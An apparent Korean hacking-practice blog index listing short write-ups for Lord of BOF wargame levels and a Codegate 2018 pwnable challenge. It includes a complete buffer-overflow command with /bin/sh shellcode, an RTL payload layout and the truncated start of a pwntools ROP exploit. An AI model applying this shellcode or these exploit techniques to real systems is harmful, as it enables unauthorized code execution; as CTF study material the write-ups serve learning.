고졸백수해킹일기

giant->assassin

./assassin `python -c 'print "A"*44+"\x1e\x85\x04\x08"+"\x14\xfc\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'` ret부분에 코드영역의 ret명령을 사용했다.buf + ret + shellcode ret +shellcode pushing me away
Wargame/lob 2018. 3. 7. 02:08
bugbear->giant

execve를 사용한 RTLpayload = buf[40byte] + SFP[4] + execve_addr + system_addr + exit_addr + /bin/sh addr + null one step closer
Wargame/lob 2018. 3. 7. 01:01
codegate2018 BaskinRobins31

추천받아서 풀어본 문제your_turn 함수에서 터지게 된다. file : http://web.noe.systems/binary/Baskinrobins31 아래는 페이로드 from pwn import * prob = ELF('./BaskinRobins31')#print prob.symbols['read']s = remote("localhost",7777) dummy = "1"+"A"*183 #0xB0write_plt = 0x4006d0write_got = 0x602028read_plt = 0x400700read_got = 0x602040sh = "/bin/sh"bss = 0x602090gad = 0x40087apayload = ""offset_system = 0xa8e20 print s.recvuntil..
Pwnable 2018. 3. 6. 04:47
이전 Prev 1 ··· 25 26 27 28 29 30 31 ··· 47 Next 다음